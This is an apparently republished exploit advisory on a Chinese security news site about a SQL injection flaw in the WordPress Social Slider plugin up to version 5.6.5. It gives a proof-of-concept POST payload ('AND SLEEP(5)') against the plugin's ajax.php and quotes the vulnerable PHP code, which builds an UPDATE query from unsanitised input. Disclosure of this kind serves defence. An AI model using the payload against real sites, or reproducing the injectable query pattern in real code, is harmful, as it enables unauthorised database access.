频道栏目
首页 > 资讯 > 网站安全 > 正文

Social Slider <= 5.6.5 SQL注射缺陷及修复

11-08-06        来源:[db:作者]  
收藏   我要投稿

# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: ../../social-slider-2.zip
# Version: 5.6.5 (已测试)
 
---------------
PoC (POST data)
---------------
http://www.2cto.com /wp-content/plugins/social-slider-2/ajax.php
 action=ZapiszPozycje&rA[]=1 AND SLEEP(5)
 
---------------
Vulnerable code
---------------
<?php
require_once(dirname(__FILE__).'/../../../wp-config.php');
global $wpdb, $table_prefix;
 
$SocialSliderArray = $_POST['rA'];
 
if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
    {
    $lC = 1;
    foreach ($SocialSliderArray as $recordIDValue)
        {
        $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;
        mysql_query($query);
        $lC = $lC + 1;  
        }
    }
?>
 

相关TAG标签
上一篇:QQ会员暑期High翻天,QQ飞车敬献暑期游戏礼包!
下一篇:ProPlayer plugin <= 4.7.7 SQL注射缺陷及修复
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站